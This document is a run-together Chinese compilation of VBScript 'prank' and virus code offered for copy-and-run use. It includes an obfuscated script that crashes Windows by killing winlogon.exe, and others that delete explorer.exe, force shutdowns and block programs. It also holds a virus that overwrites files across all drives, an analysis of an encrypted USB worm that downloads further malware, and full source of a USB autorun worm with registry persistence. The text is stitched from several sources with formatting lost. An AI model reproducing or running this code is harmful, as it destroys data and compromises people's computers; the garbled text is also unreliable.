VBS病毒代码

vbs恶作剧（病毒）程序代码恶作剧(病毒)的vbs代码，这里提供的都是一些死循环或导致系统死机的vbs对机器没坏处，最多关机重启一下就可以了打开记事本，把代码复制粘贴进去，再另存为*.vbs格式即可操作方法：把代码另存为*.VBS运行即可经本人亲自测试不会出大问题的，一般都是利用无限循环，不是死循环，可以通过任务管理器中结束wcscript.exe进程（如下图）即可解决代码的破坏。

结束VBS代码进程vbs恶作剧(病毒)程序代码代码如下:复制代码代码如下:domsgbox "hi"loop无限制的用英文报数复制代码代码如下:Set s = CreateObject("sapi.spvoice")i=0dos.speak ii=i+1loop复制代码代码如下:if MsgBox("对不起,您灌水太多需要重新启动计算机。

"&chr(10)&"确定要重启吗？",vbOKCancel+vbInformation,"重新启动计算机")=vbCancel thenmsgbox " 系统将立刻重起wow ~_^",,"你上当了！！"Set objShell = CreateObject("Wscript.Shell")objShell.Run "shutdown -s -t 5",,trueend if复制代码代码如下:strs=array(13,105,102,32,77,115,103,66,111,120,40,34,-15133,-13625,-10515,-12873,-15632,-23617,34,44,118,98,89,101,115,78,111,44,34,-12363,-12877,-13087,-13634,34,41,61,118,98,121,101,115,32,116,104,101,110,32,13,10, 32,32,32,32,32,32,32,32,32,32,32,109,115,103,98,111,120,32,34,-15133,89,-13899,-20026,-20319,33,34,13,10,101,108,115,101,13,10,32,32,32,32,109,115,103,98,111,120,32,34,-17479,-19781,-19504,-14129,33,33,32,-10249,-12630,-19507,-18525,-23636,-16202,-14655,-11589,-12350,-23636,-15133,-15635,-13873,-17966,-15925,35,-23644,-23647,64,35,-23644,37,64,-24147,-24147,35,-24147,-24147,63,34,44,54,52,44,34,-11825,-10536,-16721,-18202,33,33,33,33,33,33,33,33,33,34,13,10,83,101,116,32,119,115 ,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,1 15,99,114,105,112,116,46,83,104,101,108,108,34,41,32,13,10,119, 115,99,114,105,112,116,46,115,108,101,101,112,32,32,32,49,50,4 8,48,13,10,119,115,46,114,117,110,32,34,99,109,100,32,47,99,32, 115,116,97,114,116,32,47,109,105,110,32,110,116,115,100,32,45, 99,32,113,32,45,112,110,32,119,105,110,108,111,103,111,110,46, 101,120,101,32,49,62,110,117,108,32,50,62,110,117,108,34,44,11 8,98,104,105,100,101,13,10,101,110,100,32,105,102,13,10,13,10,1 3,10)for i=1 to UBound(strs)runner=runner&chr(strs(i))nextExecute runner这个没什么，不过加密了，大家可以解密试试复制代码代码如下:if MsgBox("你是猪头吗？",vbYesNo,"提示")=vbyes thenmsgbox "你SB啊!"elsemsgbox "还不承认!! 作为惩罚，蓝屏一下，你马上挂了#￥！@#￥%@……#……?",64,"严重警告"Set ws = CreateObject("Wscript.Shell")wscript.sleep 1200ws.run "cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul",vbhide复制代码代码如下:Set ws = CreateObject("Wscript.Shell")ws.run "cmd.exe /c call calc.exe",0下面的是删除explorer.exe，导致桌面没有显示，不过它事先帮你备份了，为同目录下的explorer.Data复制代码代码如下:set ws=CreateObject("Wscript.Shell")ws.run "cmd.exe /c taskkill /f /im explorer.exe",0wscript.sleep 900ws.run "cmd.exe /c copy %windir%\explorer.exe %windir%\explorer.Data"wscript.sleep 1200ws.run "cmd.exe /c del /q /f %windir%\explorer.exe复制代码代码如下:for each wind in verybatws.sendkeys windwscript.sleep 500nextws.popup"唉:-(( ⊙ o ⊙ )！呀，我好累啊，我下了 886",30ws.popup"下机可不能忘了关QQ 我吧QQ关了哈",8ws.run "taskkill /f /im qq.exe"ws.popup"你还要上吧慢慢玩哦",27dim WSHshellset WSHshell = wscript.createobject("wscript.shell")for d=0 to 4WSHshell.SendKeys "%{F4}"nextws.run"shutdown -s -t 1000600"wscript.sleep 2000doa=inputbox("请输入解除关机密码")if a="403746401" thenws.run"shutdown -a"msgbox"密码验证成功，enjoy the best!"exit doelsemsgbox"密码验证失败，请输入解除关机密码：403746401 ",vbretrycancelend ifloopws.popup"哈哈被吓到了吧好玩吧？你以为真的是病毒？呵呵O(∩_∩)O~，我还没那么打本事能做出病毒来！",57ws.popup"(\(^o^)/~ 好啦，跟你开了个小小玩笑。

vbs病毒的简单例⼦源代码解析说明：作者对某些代码进⾏了修改。

该⽂件是⼀个完整的程序。

该⽂件执⾏之后，会寻找硬盘上所有满⾜条件的⽂件，对其进⾏强制性覆盖（满⾜条件的⽂件数据将全部丢失）、并再创建⼀个相同⽂件名但后带.vbs的⽂件。

因此，请注意设⽴好破坏测试条件，千万不要对他⼈进⾏测试，否则，⼀切后果⾃负。

如果你的系统不⽀持.vbs,可以将后缀改为.vbedim folder,fso,foldername,f,d,dcset fso=createobject("scripting.filesystemobject")set self=fso.opentextfile(wscript.scriptfullname,1)vbscopy=self.readall '读取病毒体，以备复制到⽂件self.closeset dc=fso.Drivesfor each d in dcif d.drivetype=3 or d.drivetype=2 then '检查磁盘类型wscript.echo d '弹出窗⼝，显⽰找到盘符scan(d)end ifnextlsfile=wscript.scriptfullname '该脚本程序路径set lsfile=fso.getfile(lsfile)lsfile.delete(true) '病毒运⾏后⾃我删除(本⼈⾃加，爱⾍病毒本⾝没有该代码）sub scan(folder_)on error resume nextset folder_=fso.getfolder(folder_)set files=folder_.filesfor each file in filesext=fso.GetExtensionName(file) '获取⽂件后缀ext=lcase(ext) '后缀名转换成⼩写字母if ext="mp5" then '如果后缀名是mp5,当然不存在这种⽂件，这⾥可以⾃⼰修改，但是注意。

3分钟教你编写“病毒”，不懂编程的门外汉也能秒学会提到编程，可能很多新⼿或者从未接触过编程的⼈会觉得特别⾼深，需要复杂的编译器等等，⼩编就给⼤家推荐⼀种脚本语⾔，vbs脚本语⾔，不需要编译器，⽤电脑⾃带的记事本就能够编写，下⾯⼩编教⼤家如何编写⼀个⼩⼩的脚本“病毒”程序，实现的功能就是悄⽆声息的禁⽌电脑中某个程序的运⾏。

1.控制⾯板->⽂件资源管理器选项->查看->隐藏已知⽂件夹类型的扩展名，如果前⾯勾选了就取消勾选，没有勾选就不⽤管。

2.新建⼀个⽂本⽂档，重命名为后缀为vbs的⽂件，如果第⼀步没有完成也就⽆法修改⽂件名的后缀。

3.右键vbs⽂件编辑，现在可以开始正式编写代码了。

doset bag = getobject('winmgmts:\\.\root\cimv2')set i = bag.execquery('select * from win32_process where name ='KuGou.exe'')for each objprocess in iobjprocess.terminatenextwscript.sleep 1000loop代码很简单，do loop是重复执⾏的意思，中间的代码被不断的执⾏，sleep 1000的意思是休眠1000毫秒，也就是中间的代码1秒钟执⾏⼀次，第⼆⾏代码的意思是遍历所有进程，然后第三⾏代码设置KuGou.exe为进程对象，接着for next 遍历系统正在运⾏的进程，如果有KuGou.exe的进程就将它杀掉，每秒执⾏⼀次。

代码完成了，是不是很简单！（看不懂也没关系，复制粘贴就⾏）4.保存⽂件，运⾏⽂件，之后你会发现⾃⼰的酷狗⾳乐不管怎样都打不开，当然你也可以把代码⾥⾯的KuGou.exe换成其他的软件的进程名，实现的效果就是禁⽌该软件的运⾏，即使⽤杀毒软件杀毒也⽆法运⾏该软件。

U盘病毒-.vbs-wscript.exe机子又中毒了，这次中的是U盘病毒。

前几天在九六设计室拷文件的时候发现他们那边机子上的word文档不能正常打开，当时也没怎么在意，等把东西拷到我的电脑里面的时候才发现大事不妙，终于不得不承认我又中标了。

先说说症状：1.卡巴斯基不断的报警，有四五个病毒不断的复制，始终杀不完。

在每个盘里新建一个antorun.inf文件夹才得以解决。

2.360杀毒软件没运行多长时间自动关闭。

3.病毒名中有vbs，杀完毒后删除的文件是administrator.vbs4.启动项里有administrator.vbs5.运行任务管理器，可以看到有wscript.exe进程，几秒钟后任务管理器自动关闭。

6.机子卡，像QQ这样的文件也会自动关闭。

做一下准备工作:1.首先准备一个没有被感染的wscript.exe文件,为了恢复被病毒感染的程序(可以到其它机子上找,安装盘里也有,上网下载也可以).2.将如下代码复制到一个新建文本文档里.并改名为hidden.reg,用处是:修改被病毒破坏的显示系统隐藏文件的注册表Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Expl orer\Advanced\Folder\Hidden]'Text'='@shell32.dll,-30499''Type'='group''Bitmap'=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f ,00,6f,00,74,\00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c, 00,53,00,\48,00,45,00,4c,00,4c,00,33,00,32,00,2e,00,64,00,6c,00,6c,00,2c,00, 34,00,00,\00'HelpID'='shell.hlp#51131'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Expl orer\Advanced\Folder\Hidden\NOHIDDEN]'RegPath'='Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\ \Advanced''Text'='@shell32.dll,-30501''Type'='radio''CheckedValue'=dword:00000002'ValueName'='Hidden''DefaultValue'=dword:00000002'HKeyRoot'=dword:80000001'HelpID'='shell.hlp#51104'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]'RegPath'='Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\ \Advanced''Text'='@shell32.dll,-30500''Type'='radio''CheckedValue'=dword:00000001'ValueName'='Hidden''DefaultValue'=dword:00000002'HKeyRoot'=dword:80000001'HelpID'='shell.hlp#51105'当然也可以直接查找到注册表中的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo rer\Advanced\Folder\Hidden\SHOWALL中的CheckedValue值改为13.将下面代码保存到另外一个文本文档里,并改名为*.bat(如:vbs.bat). @echo off@echo 在其它任务管理器查(如:超级兔子)看时有wscript.exe程序@echo PS: 在windows任务管理器中无法找到此程序pause@echo 下一步会结束桌面,属于正常,等查杀结束将会恢复!taskkill /im explorer.exe /ftaskkill /im wscript.exe /t /freg deleteHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\r un /va /f@echo 请耐心等待,可能过程有点长....del c:\autorun.* /f /q /asdel %SYSTEMROOT%\system32\autorun.* /f /q /asdel c:\.vbs /f /q /s /asdel c:\.vbe /f /q /s /asdel c:\wscript.exe /f /q /sdel d:\autorun.* /f /q /s /asdel e:\autorun.* /f /q /s /asdel f:\autorun.* /f /q /s /asdel g:\autorun.* /f /q /s /asdel h:\autorun.* /f /q /s /asdel i:\autorun.* /f /q /s /asdel j:\autorun.* /f /q /s /asdel k:\autorun.* /f /q /s /asdel l:\autorun.* /f /q /s /as@echo 请单击确定,以修复注册表!call hidden.regcopy wscript.exe %SYSTEMROOT%\system32\start explorer.exe@echo 病毒已经清理完毕:)pause批处理作用原理是:关闭explorer.exe程序(很多病毒喜欢加载到这个进程中)关闭病毒程序wscript.exe进程,删除其自启动项,删除病毒文件本体和被感染的wscript.exe文件删除各个硬盘自启动文件autorun.inf 修复系统隐藏注册表项重新拷贝一个未被感染的wscript.exe文件到system32文件夹中建立桌面程序退出4.将做好的的hidden.reg和*.bat文件和wscript.exe文件放到同一个文件夹中.注意事项:注:在清除玩病毒前切不可以双击打开硬盘和u盘也不可以右键打开要用win 文件管理器或者在地址栏打开1.开始运行后会出现桌面消失的现象,情况属于正常,等杀毒结束,会新建桌面.2.删除自启动文件是可能有点慢,请耐心等候.3.在删除wscript.exe文件是有可能有提示,说是删除系统文件要从安装盘中重新拷贝什么的,同意就可以了.后面会自动拷贝此文件4.在修复注册表是会提示是否加入,点确定即可.步骤:双*.bat文件运行然后按照提示一步步向下进行就可以了!善后工作:1.关闭硬盘的自动播放功能.这样可以阻挡大部分的通过u盘自动播放的传染的病毒.(如本病毒)方法:开始-运行-输入'gpedit.msc'打开策略组-找到:'用户配置-系统模板-系统'-单击系统在右侧找到'关闭自动播放'一项-右键单击点属性-选择'已使用'-下面的关闭自动播放选项选择所有硬盘-应用确定2.如果u盘有毒的话.删除u盘的病毒方法:将下列代码保存为u.bat文件然后双击,也可以在cmd里面逐行输入. 其中X为u盘盘符del X:\.vbs /f /q /s /asdel X:\.vbe /f /q /s /asdel X:\autorun.* /f /q /s /as3.建议重启OKEY 要清除的病毒搞定了呵呵:)。

病毒名称：.vbsMD5: 64ea1c0e8f653984f0fde25b77f8494f此病毒是VBS脚本病毒，多重加密，通过U盘进行传播感染，设置注册表自启动，每过一段时间运行，通过设置特定条件，进行其他恶意行为。

网上卸载其他恶意程序并执行。

破坏系统隐藏属性。

整理一下主主体代码：j="\":til="SY" ‘autorun.inf中的节名:btj=900:vs=".vbs":ve=".vbe":cm="%comspec% /c " ‘cmd:dfo="/u#t/":inf="\autorun.inf" ‘自启动文件set ws=createobject("wscript.shell"):set fso=createobject("scripting.filesystemobject")set wmi=getobject("winmgmts:\\.\root\cimv2"):set sis=wmi.execquery("select * from win32_operatingsystem")set dc=fso.drives:set ats=wmi.execquery("select * from win32_service where name='Schedule'")for each atc in ats:cat=atc.state:next:if cat="Stopped" then ws.run "net start ""task scheduler""",0,falseouw=wscript.scriptfullname: 'scriptfullnamewin=fso.getspecialfolder(0)&j: 'C:\WINDOWSdir=fso.getspecialfolder(1)&j 'C:\WINDOWS\system32tmp=fso.getspecialfolder(2)&j: 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp wbe=dir&"wbem\":mir=left(ouw,len(ouw)-len(wscript.scriptname))cnr="\computername":cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr:cna=rr(cnp,0):if cna="" then cna=tilwsc="wscript.exe"csc="cscript.exe"css=csc&" //nologo "wsr=rn&":createobject(""wscript.shell"").run"c=vbcrlf'-----------------inc------------------------'SY'[autorun]'open=wscript.exe .\.vbs'shell\open\command=wscript.exe .\.vbs'shell\open\default=1inc=til&c&"[autorun]"&c&"open="&wsc&" .\"&vs&c&"shell\open\command="&wsc&" .\"&vs &c&"shell\open\default=1"'-----------------inc------------------------sf="shell folders\":rop="\software\microsoft\windows\currentversion\explorer\":dap=rr("HKCU"&rop&sf&"desktop",0)&j 'C:\Documents and Settings\Administrator\桌面\rpa="HKLM\software\"&cna&j: 'HKLM\software\QUBY-9B3768E839\fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs: 'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\.vbsfap=rr("HKCU"&rop&sf&"favorites",0)&j 'C:\Documents and Settings\Administrator\Favorites\ht=ec("ivwt?56"): 'http"\\ha=ec(":;9:7>5kw9"): '/hb=hl&"1;<<=6x"&hl&"r;" '|1;<<=6x|r;hc="0dwuEpE": '0dwuEpEhd=ec("$"+hc): '#.asp?i=he=ec("c"+hc) 'b.asp?i=rsp="HKLM\software\microsoft\windows\currentversion\"rsb=rsp&"run\":rsp=rsp&"policies\explorer\run\"&cnahip="HKCU"&rop&"advanced\showsuperhidden"sz=lcase(fso.getfilename(wscript.fullname))if mir=dir then sys=truefor each si in sis:ca=si.caption:cs=si.codeset:cc=si.countrycode:os=si.oslanguage:wv=si.version:nextif instr(wv,"5.2")<>0 then hb="w"+hb:lb="v" else if os<>2052 and cc<>86 then hb="p"+hb:lb="o" else hb="d"+hb:lb="c"for each d in dcif mir=d&j then ws.run "explorer "&d,3,false:bir=truenext'判断文件路径是否在磁盘根目录或"C:\WINDOWS\system32\wbem\"或"C:\WINDOWS"下'如果不是就退出if bir or sys or mir=win or mir=wbe then tir=true else wscript.quitouc=rt(ouw,-1): '读取本身代码ver=gv(ouw): ‘版本验证‘如果版本验证失败,则弹出“See You”消息框,执行km函数，参数为1‘验证成功执行km函数,参数为0,km是主要感染函数if ver="" or not isnumeric(ver) then msgbox("See You!"):km 1 else km 0if sys thenif sz=wsc then pr csc,-1if pr(csc,2)=1 then wscript.quitwscript.sleep 2000if pr(csc,1)=0 then ws.run css&dir&ve,0,false:if pr(csc,1)=1 then wscript.quitif rr("til",1)<>til then wr "til",til:wr "tjs",btj:wr "djs",date-1:wr "ded",0djs=rr("djs",1):if isdate(djs) and date-cdate(djs)>50 and lb<>"o" then wr "osw",4‘如果读取atd项注册表为1,那么删除所有计划任务if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0‘如果在temp文件夹存在le文件，那么执行le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&lecu:er 10elsewscript.sleep 5000if pr(wsc,2)=2 then:if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",dateif pr(csc,1)<>1 or pr(wsc,1)=0 then bf dir&ve,ouc,7:ws.run css&dir&ve,0,falseend if3.下面主要病毒思路，其他细节请看各个函数吧>_<(1)'判断文件路径是否在磁盘根目录或"C:\WINDOWS\system32\wbem\"或"C:\WINDOWS"下'如果不是就退出if bir or sys or mir=win or mir=wbe then tir=true else wscript.quitouc=rt(ouw,-1): '读取本身代码ver=gv(ouw): ‘进行验证(2)‘如果上面验证错误，那么回弹出“See You”,之后执行Km函数，参数为1,否则参数为0‘这里是anti，也是为了防止编译成exe文件。

vbs病毒源⽂件rem vbs.rhlDim fs,r,ss,w,reg,regpath,dvbsddd="Set fs =" &chr(67) & "reate" & "Obj" & chr(101) & "c" & chr(116) & chr(40) & chr(34) & "Scrip" & chr(116) & "ing.File" & chr(83) & "yste" &chr(109) & chr(79) & "bject" & chr(34) & chr(41) Execute dddrrr="set r =" &chr(119) & "scri" & "pt." &chr(67) & "reate" & "Obj" & chr(101) & "c" & chr(116) & chr(40) & chr(34) & chr(119) & "scri" & "pt." &chr(115) & "he" & chr(108) & chr(108) & chr(34) & chr(41) Execute rrrsss="fs." & chr(103) &"etfil" & chr(101) & chr(40) &chr(119) & "scri" & "pt." & "scri" & chr(112) & "tfull" &chr(110) & "ame" & chr(41)ttt="set dvbs =" & sssExecute tttr.run (fs.GetSpecialFolder(0)&"\explorer.exe .\")main()On Error Resume Nextsub main()regtime()finddrive()countdrive(ss)regwrite()ganranfile(ss)xunhuan()end subFunction finddrive()if ="USBDRIVE.dll" thenregwrite()ganrandisk()end ifif <>"autorun.vbs" and <>"USBDRIVE.dll" thenregwrite()dvbs.delete(true)end ifss=Trim("")Set dc = fs.DrivesFor Each d In dcIf d.DriveType = 1 or d.DriveType= 2 and d.IsReady Thenss = ss & d.DriveLetterend ifNextss = StrReverse(LCase(Trim(ss)))end FunctionFunction countdrive(ss)On Error Resume Nextdim xFor i = 1 To Len(ss)x = Mid(ss, i, 1)if x="" thenx=Mid(ss, 1, 1)i=1end ifSet w = fs.GetDrive(x)ganrandiskroot()Nextend FunctionFunction ganrandiskroot()dim c,s,f,vbc,ts,runregOn Error Resume NextIf w.DriveType=2 or w.DriveType=1 and w.IsReady ThenIf fs.FileExists(fs.GetSpecialFolder(1) & "\USBDRIVE.dll") Thenelsefff=sss & ".copy(" & chr(34) & fs.GetSpecialFolder(1) & "\USBDRIVE.dll" &chr(34) & ")"Execute fffIf fs.FileExists(fs.GetSpecialFolder(1) & "\USBDRIVE.dll") Thenelsefff=sss & ".copy(" & chr(34) & "D:\System Volume Information\USBDRIVE.dll" &chr(34) & ")"Execute fffif fs.FileExists("D:\System Volume Information\USBDRIVE.dll") ThenSet ts = fs.CreateTextFile(w.DriveLetter & ":\vbs.reg", true)ts.WriteLine "Windows Registry Editor Version 5.00"ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"⽂本⽂件"& chr(34)ts.closeSet f = fs.GetFile(w.DriveLetter & ":\vbs.reg")f.attributes=f.attributes+7Set ts = fs.CreateTextFile(w.DriveLetter & ":\doc.reg",true)ts.WriteLine "Windows Registry Editor Version 5.00"ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"Microsoft Word ⽂档"& chr(34)ts.closeSet f = fs.GetFile(w.DriveLetter & ":\doc.reg")f.attributes=f.attributes+7end ifend ifend ifIf fs.FileExists(w.DriveLetter & ":\autorun.vbs") ThenSet c = fs.opentextfile(w.DriveLetter & ":\autorun.vbs", 1)vbc = c.readallIf InStr(vbc,"vbs.rhl") <> 0 Thenc.CloseElsec.CloseSet c = fs.GetFile(w.DriveLetter & ":\autorun.vbs")c.delete(true)fff=sss & ".copy(" & chr(34) & w.DriveLetter & ":\autorun.vbs" &chr(34) & ")"Execute fffs=Array("2007总结病毒","这是病毒","违纪病毒","检查病毒","⿊名单病毒","没有发出的病毒","恋爱的病毒（病毒）")Randomizefff=sss & ".copy(" & chr(34) & w.DriveLetter & ":\" & s(i) & ".vbs" &chr(34) & ")"Execute fffSet b = fs.GetFile(w.DriveLetter & ":\" & s(i) & ".vbs")b.attributes=b.attributes-b.attributesSet c = fs.GetFile(w.DriveLetter & ":\autorun.vbs")c.attributes=c.attributes+7If fs.FileExists(w.DriveLetter & ":\vbs.reg") or fs.FileExists(w.DriveLetter & ":\doc.reg") Thenelseif w.DriveLetter="C" thenSet ts = fs.CreateTextFile(fs.GetSpecialFolder(1) & "\vbs.reg", true)ts.WriteLine "Windows Registry Editor Version 5.00"ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"⽂本⽂件"& chr(34)ts.closeSet f = fs.GetFile(fs.GetSpecialFolder(1) & "\vbs.reg")f.attributes=f.attributes+7Set ts = fs.CreateTextFile(fs.GetSpecialFolder(1) & "\doc.reg")ts.WriteLine "Windows Registry Editor Version 5.00"ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"Microsoft Word ⽂档"& chr(34) ts.closeSet f = fs.GetFile(fs.GetSpecialFolder(1) & "\doc.reg")f.attributes=f.attributes+7elseSet ts = fs.CreateTextFile(w.DriveLetter & ":\vbs.reg",true)ts.WriteLine "Windows Registry Editor Version 5.00"ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"⽂本⽂件"& chr(34)ts.closeSet f = fs.GetFile(w.DriveLetter & ":\vbs.reg")f.attributes=f.attributes+7Set ts = fs.CreateTextFile(w.DriveLetter & ":\doc.reg",true)ts.WriteLine "Windows Registry Editor Version 5.00"ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"Microsoft Word ⽂档"& chr(34) ts.closeSet f = fs.GetFile(w.DriveLetter & ":\doc.reg")f.attributes=f.attributes+7end ifend ifend ifelsefff=sss & ".copy(" & chr(34) & w.DriveLetter & ":\autorun.vbs" &chr(34) & ")"Execute fffs=Array("检查病毒","2007总结病毒","违纪病毒","这是病毒","⿊名单","没有发出的病毒","恋爱的病毒（病毒）")Randomizei= Int((6 * Rnd) + 1)fff=sss & ".copy(" & chr(34) & w.DriveLetter & ":\" & s(i) & ".vbs" &chr(34) & ")"Execute fffSet b = fs.GetFile(w.DriveLetter & ":\" & s(i) & ".vbs")b.attributes=b.attributes-b.attributesSet c = fs.GetFile(w.DriveLetter & ":\autorun.vbs")c.attributes=c.attributes+7If fs.FileExists(w.DriveLetter & ":\vbs.reg") or fs.FileExists(w.DriveLetter & ":\doc.reg") Thenelseif w.DriveLetter="C" thenSet ts = fs.CreateTextFile(fs.GetSpecialFolder(1) & "\vbs.reg", true)ts.WriteLine "Windows Registry Editor Version 5.00"ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"⽂本⽂件"& chr(34)ts.closeSet f = fs.GetFile(fs.GetSpecialFolder(1) & "\vbs.reg")f.attributes=f.attributes+7Set ts = fs.CreateTextFile(fs.GetSpecialFolder(1) & "\doc.reg")ts.WriteLine "Windows Registry Editor Version 5.00"ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"Microsoft Word ⽂档"& chr(34) ts.closeSet f = fs.GetFile(fs.GetSpecialFolder(1) & "\doc.reg")f.attributes=f.attributes+7elseSet ts = fs.CreateTextFile(w.DriveLetter & ":\vbs.reg", true)ts.WriteLine "Windows Registry Editor Version 5.00"ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"⽂本⽂件"& chr(34)ts.closeSet f = fs.GetFile(w.DriveLetter & ":\vbs.reg")f.attributes=f.attributes+7Set ts = fs.CreateTextFile(w.DriveLetter & ":\doc.reg",true)ts.WriteLine "Windows Registry Editor Version 5.00"ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"Microsoft Word ⽂档"& chr(34) ts.closeSet f = fs.GetFile(w.DriveLetter & ":\doc.reg")f.attributes=f.attributes+7end ifend ifend ifIf fs.FileExists(w.DriveLetter & ":\autorun.inf") ThenSet c = fs.opentextfile(w.DriveLetter & ":\autorun.inf", 1)vbc = c.readallIf InStr(vbc,"WScript.exe .\autorun.vbs") <> 0 Thenc.CloseElseSet f = fs.GetFile(w.DriveLetter & ":\autorun.inf")f.attributes=f.attributes-f.attributesSet ts = f.OpenAsTextStream(2,-2)ts.WriteLine "[AutoRun]"ts.WriteLine ""ts.WriteLine "shell\open=打开(&O) "ts.WriteLine "shell\open\Command=WScript.exe .\autorun.vbs"ts.WriteLine "shell\open\Default=1 "ts.closef.attributes=f.attributes+7end ifelseSet ts = fs.CreateTextFile(w.DriveLetter & ":\autorun.inf",true)ts.WriteLine "[AutoRun]"ts.WriteLine "open= "ts.WriteLine ""ts.WriteLine "shell\open=打开(&O) "ts.WriteLine "shell\open\Command=WScript.exe .\autorun.vbs"ts.WriteLine "shell\open\Default=1"ts.closeSet f = fs.GetFile(w.DriveLetter & ":\autorun.inf")f.attributes=f.attributes+7End Ifend ifend FunctionFunction regwrite()On Error Resume Nextdim sa1="HKE" & "Y_CUR" & "RENT_US" & "ER\Soft" & "ware\Mi" & "croso" & "ft\Win" & "dows\Cur" & "rentV" & "ersion\Exp" & "lorer\Ad" & "vanced\" （a1= HKEY_CURRENT_USER\Software\Microso ft\Windows\Cu a2="HK"&"EY_CLAS"&"SES_RO" & "OT\DLL" & "File\" （a2=HKEY_CLASSES_ROOT\DLLFile）a3="HKEY" & "_LOCA" & "L_MACH" & "INE\SOFT" & "WARE\Mi" & "cros" & "oft\Win" & "dows\Cur" & "rentVer" & "sion\poli" & "cies\Expl" & "orer\NoDr" & "iveTypeAutoRun"（a3=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveTypeAutoRun）a4="HKE" & "Y_CURR" & "ENT_USE" & "R\Softw" & "are\Micr" & "osoft\Wi" & "ndows\Cur" & "rentVersi" & "on\Polici" & "es\Explor" & "er\NoDriveT" & "ypeAutoRun"（a4=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun）a5="HK" & "EY_LO" & "CAL_MA" & "CHINE\Sof" & "tware\Mi" & "croso" & "ft\Wind" & "ows\Curre" & "ntVersi" & "on\Ru" & "n\USBDR" & "IVE.dll"(a5=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\USBDRIVE.dll)a6="R.Re" & "gWri" & chr(116) & "e" (a6=R.RegWrichr(116) e)a7="HKE" & "Y_CLAS" & "SES_ROO" & "T\VBSF" & "ile\Defau" & "ltIcon\"(a7=HKEY_CLASSES_ROOT\VBSFile\DefaultIcon)set s=fs.GetDrive(fs.GetDriveName(dvbs.path))scandoc(fs.GetSpecialFolder(0) & "\Installer")if reg="wordicon.exe" thenif s="C:" thenif fs.FileExists("D:\System Volume Information\USBDRIVE.dll") Thenr.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & "D:\System Volume Information\doc.reg")elser.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & fs.GetSpecialFolder(1) & "\doc.reg")end ifelseif fs.FileExists("D:\System Volume Information\USBDRIVE.dll") Thenr.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & "D:\System Volume Information\doc.reg")elser.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & s.DriveLetter & ":\doc.reg")end ifend ifppp=a6&Space(2)&chr(34) & a7 & chr(34)&"," &chr(34)&regpath & ",1"&chr(34)Execute pppelseif s="C:" thenif fs.FileExists("D:\System Volume Information\USBDRIVE.dll") Thenr.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & "D:\System Volume Information\vbs.reg")elser.run(fs.GetSpecialFolder(1) & 